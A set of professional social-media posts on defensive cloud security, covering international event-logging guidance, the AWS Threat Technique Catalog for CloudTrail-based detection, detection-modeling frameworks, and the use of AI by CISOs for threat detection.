How to Improve Cloud Threat Detection in Organizations

🌍International Guidance for Enhanced Cybersecurity: Best Practices for Event Logging and Threat Detection🌍 The Australian Government's Australian Cyber Security Centre (ACSC), in collaboration with global partners like the #NSA, #CISA, the UK's #NCSC, and agencies from Canada, New Zealand, Japan, South Korea, Singapore, and the Netherlands, has released a comprehensive report on best practices for event logging and threat detection. 🚀The report defines a baseline for event logging best practices and emphasizes the importance of robust event logging to enhance security and resilience in the face of evolving cyber threats. Why Event Logging Matters: Event logging isn't just about keeping records—it's about empowering organizations to detect, respond to, and mitigate cyber threats more effectively. The guidance provided in this report aims to bolster an organization’s resilience by enhancing network visibility and enabling timely detection of malicious activities. 🔍 Key Highlights: 🔹Enterprise-Approved Event Logging Policy: Develop and implement a consistent logging policy across all environments to enhance the detection of malicious activities and support incident response. 🔹Centralized Log Collection and Correlation: Utilize a centralized logging facility to aggregate logs, making detecting anomalies and potential security breaches easier. 🔹Secure Storage and Event Log Integrity: Implement secure mechanisms for storing and transporting event logs to prevent unauthorized access, modification, or deletion. 🔹Detection Strategy for Relevant Threats: Leverage behavioral analytics and SIEM tools to detect advanced threats, including "Living off the Land" (LOTL) techniques used by sophisticated threat actors. 📊 Use Case: Detecting "Living Off the Land" Techniques: One highlighted use case involves detecting LOTL techniques, where attackers use legitimate tools available in the environment to carry out malicious activities. The report showcases how the Volt Typhoon group leveraged LOTL techniques, such as using PowerShell and other native tools on compromised Windows systems, to evade detection and conduct espionage. Effective event logging, including process creation events and command-line auditing, was crucial in identifying these activities as abnormal compared to regular operations. Couple this report with the CISA Zero Trust Maturity Model (ZTMM): The report's best practices align with CISA's ZTMM's Visibility and Analytics capability. By following these publications, organizations can progress along their maturity path toward optimal dynamic monitoring and advanced analysis. (Full disclosure: I was co-author of CISA's ZTMM) 💪Implementing these best practices from the Australian Signals Directorate & others is critical to achieving comprehensive visibility and security, aligning with global cybersecurity frameworks. #cybersecurity #zerotrust #digitaltransformation #technology #cloudcomputing #informationsecurity

Everyone is talking about the new Threat Technique Catalog for AWS, but what is it and how do you use it? Let’s take a look. 🔍 What it is: Every technique in this catalog comes from real security events #AWS CIRT investigated. They've taken #MITRE ATT&CK techniques and enhanced them with AWS-specific detection methods, plus added ones not already covered that they've observed in the wild. 🎯 How to use it tactically: 📌 Map threats to services you use: Use the sidebar to drill into specific AWS services like S3, IAM, or EC2 and see what attackers have used against them. 📌 Search/monitor CloudTrail for sketchy events: Each technique includes CloudTrail event names (e.g., iam:CreateAccessKey, s3:PutBucketPolicy) so you can build detection logic or hunt for suspicious patterns. 📌 Build playbooks + mitigations: It includes practical detection and mitigation guidance. Use this to update your detection rules or reinforce IAM policies. The catalog organizes techniques by AWS service - ie: if you're securing #S3, you can see exactly how attackers could target S3 and what CloudTrail events to watch for. 💡Example: If you’re worried about S3 #ransomware via SSE-C key encryption, you can go here (https://lnkd.in/eQzEmmTS) and you’ll see: + Pre-requisites for an attacker to pull this off + Specific CloudTrail Event(s) to look for (in this case s3:CopyObject) + How to set up detection + How to mitigate This bridges the gap between theoretical attack frameworks and real-world AWS security monitoring. A lot of us probably already have this info and knowledge (especially if you train with Cybr) but having it all in a central location, with this formatting, and managed by CIRT is a big benefit! 🔗Start here: https://lnkd.in/epefnPU4 #awscommunitybuilders #awssecurity #cloudsecurity

In addition to threat modeling, we need detection modeling. This is a core part of threat informed defense. Starting with known threats (whether its ATT&CK or bespoke scenarios internally) is a great start, but theres still a lot of work & nuance to get this to a finished analytic or detection. We want to know things like: - how threats specifically manifest in OUR environment - build detections that actually work for OUR tech stack and processes Really cool release from the "Summiting the Pyramid" framework from Center for Threat-Informed Defense to help us bridge this gap: Detection Decomposition Diagrams (D3). These D3 visuals give defenders a view across multiple implementations of a technique to identify analytic and event observables for robust detections. D3 visuals include benign and malicious implementations of the technique. Observables which span across multiple implementations provide higher robustness; that is, resistance to adversary evasion over time. Other observables may be used for better accuracy rates. This coincides with the OpenTide paper released by Amine Besson (Threat Informed Detection Modeling and Engineering as-Code) which is an absolute gold mine of how & why to do this in practice. These approaches connect abstract capabilities to concrete detection opportunities. The real power comes from combining threat modeling WITH detection modeling. This concept is not necessarily new & is the product of a lot of great work already done by folks like Andrew VanVleet as well. Its a whole other level when you can combine TTPs with prevalence, choke point and actionability to the texture of which all detections are written (logs!) with information like core/tiered observables. This is how you create robust & accurate detections. Check out the great work by these folks below: ⛰️ Summit the Pyramid v2 Release: Center for Threat-Informed Defense https://lnkd.in/eb9Cb8Q5 🌊 OpenTide: https://lnkd.in/emcX4rKk 🧱 Improving Threat Identification with Detection Data Models: https://lnkd.in/eZ5HGw-T

AI and data are changing how we protect our organizations, and there are some smart ways CISOs can make the most of these tools. First, machine learning helps spot unusual behavior by analyzing tons of data in real time—things like odd login times or unexpected scripts running. Yet, models need to keep learning, so regularly updating them with new info and analyst feedback is key. Bringing data scientists into security teams can really sharpen threat detection by tailoring insights to your specific setup. Plus, custom AI models can help hunt threats, spot vulnerabilities, and even flag AI-generated attacks. Transparency is important too. Explainable AI helps everyone understand why a system flags something, building trust and better decisions. At the end of the day, close teamwork between security pros and data experts makes all the difference. #AI #MachineLearning #Cybersecurity #CISO